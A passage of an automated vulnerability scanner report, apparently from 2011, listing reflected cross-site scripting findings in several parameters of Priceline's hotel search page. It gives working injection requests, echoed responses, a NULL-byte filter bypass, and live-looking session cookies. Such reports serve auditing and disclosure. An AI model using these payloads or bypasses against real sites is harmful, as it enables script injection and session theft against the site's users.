Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:30 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a20111003001430b72011715219; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A30&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:30 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8955
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutMonth" value="101f9d7"style="x:expression(alert(1))"7ebc51a19c27b1e81"/>
...[SNIP]...
4.114. http://travela.priceline.com/hotel/searchHotels.do [CkOutYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the CkOutYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71755"style%3d"x%3aexpression(alert(1))"34164ddab186c8c9c was submitted in the CkOutYear parameter. This input was echoed as 71755"style="x:expression(alert(1))"34164ddab186c8c9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=201171755"style%3d"x%3aexpression(alert(1))"34164ddab186c8c9c&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:56 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a2011100300145654c011739233; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A14%3A56&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:14:56 GMT; Path=/
Set-Cookie: JSESSIONID=8713C6827FBDD28A5D10D6451CD4ECEB; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="CkOutYear" value="201171755"style="x:expression(alert(1))"34164ddab186c8c9c"/>
...[SNIP]...
4.115. http://travela.priceline.com/hotel/searchHotels.do [Initialized parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the Initialized request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f700"style%3d"x%3aexpression(alert(1))"a1fe5a6ded2a0bc4c was submitted in the Initialized parameter. This input was echoed as 1f700"style="x:expression(alert(1))"a1fe5a6ded2a0bc4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y1f700"style%3d"x%3aexpression(alert(1))"a1fe5a6ded2a0bc4c&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:15:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5564010a20111003001554a76011741318; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A15%3A54&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:15:54 GMT; Path=/
Set-Cookie: JSESSIONID=EEBB065C45978A81D0AA825A7A755F5C; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="Initialized" value="Y1f700"style="x:expression(alert(1))"a1fe5a6ded2a0bc4c"/>
...[SNIP]...
4.116. http://travela.priceline.com/hotel/searchHotels.do [KMode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the KMode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f375a"style%3d"x%3aexpression(alert(1))"1083b24de5b was submitted in the KMode parameter. This input was echoed as f375a"style="x:expression(alert(1))"1083b24de5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Yf375a"style%3d"x%3aexpression(alert(1))"1083b24de5b&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:33 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a4663010a20111003004433053011593807; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A33&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:33 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8673
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="KMode" value="Yf375a"style="x:expression(alert(1))"1083b24de5b"/>
...[SNIP]...
4.117. http://travela.priceline.com/hotel/searchHotels.do [RefClickID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the RefClickID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d666c"style%3d"x%3aexpression(alert(1))"6029e375022ac7278 was submitted in the RefClickID parameter. This input was echoed as d666c"style="x:expression(alert(1))"6029e375022ac7278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCHd666c"style%3d"x%3aexpression(alert(1))"6029e375022ac7278&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:53 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a20111003001253981011595279; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCHd666c%22style%3D%22x%3Aexpression%28alert%281%29%29%226029e375022ac7278&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A53&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:53 GMT; Path=/
Set-Cookie: JSESSIONID=4263A88E7E9EDD0CE311D6D440D7189A; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8925
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="RefClickID" value="HOTELSEARCHd666c"style="x:expression(alert(1))"6029e375022ac7278"/>
...[SNIP]...
4.118. http://travela.priceline.com/hotel/searchHotels.do [RefID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5802f"style%3d"x%3aexpression(alert(1))"1cc0c45dbb9a463a3 was submitted in the RefID parameter. This input was echoed as 5802f"style="x:expression(alert(1))"1cc0c45dbb9a463a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO5802f"style%3d"x%3aexpression(alert(1))"1cc0c45dbb9a463a3&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:41 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5564010a20111003001241974011594863; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A12%3A41&ID=IGOUGO5802f%22style%3D%22x%3Aexpression%28alert%281%29%29%221cc0c45dbb9a463a3&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:12:41 GMT; Path=/
Set-Cookie: JSESSIONID=E7D0ED24577F3A9566271CAF9EB4BDB6; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8944
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="RefID" value="PLIGOUGO5802f"style="x:expression(alert(1))"1cc0c45dbb9a463a3"/>
...[SNIP]...
4.119. http://travela.priceline.com/hotel/searchHotels.do [affiliateSubID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the affiliateSubID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5b2"style%3d"x%3aexpression(alert(1))"5ad1231780b was submitted in the affiliateSubID parameter. This input was echoed as 5c5b2"style="x:expression(alert(1))"5ad1231780b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A5c5b2"style%3d"x%3aexpression(alert(1))"5ad1231780b HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:45:07 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a201110030045078f1011587742; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A45%3A07&ID=AWAYNETWORK&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:45:07 GMT; Path=/
Set-Cookie: JSESSIONID=3B7735426801E4E75FB6596A4FA0E81B; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8667
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="affiliateSubID" value="514A5c5b2"style="x:expression(alert(1))"5ad1231780b"/>
...[SNIP]...
4.120. http://travela.priceline.com/hotel/searchHotels.do [checkInDate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the checkInDate request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5872"style%3d"x%3aexpression(alert(1))"291cab46a60d439a6 was submitted in the checkInDate parameter. This input was echoed as b5872"style="x:expression(alert(1))"291cab46a60d439a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11b5872"style%3d"x%3aexpression(alert(1))"291cab46a60d439a6&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:10 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5564010a20111003001310992011591727; Domain=.priceline.com; Path=/
